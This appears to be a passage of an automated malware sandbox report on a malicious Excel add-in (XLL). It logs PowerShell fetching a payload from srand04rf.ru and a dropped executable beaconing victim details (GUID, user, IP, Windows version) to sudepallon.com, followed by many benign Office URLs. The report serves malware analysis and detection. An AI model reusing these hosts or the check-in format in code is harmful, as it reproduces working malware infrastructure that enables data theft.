        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,16_2_00611FC0
        Source: global trafficHTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
        Source: global trafficHTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: srand04rf.ru
        Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: snd32sys.exeString found in binary or memory: http://api.ipify.org
        Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.comodoca.com0
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.sectigo.com0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png8
        Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru
        Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru/08
        Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.drString found in binary or memory: http://srand04rf.ru/08.jpg
        Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmpString found in binary or memory: http://srand04rf.ru4&jt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.aadrm.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.onedrive.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.entity.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cortana.ai/api
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://cr.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://devnull.onenote.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://directory.services.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester8
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://graph.windows.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
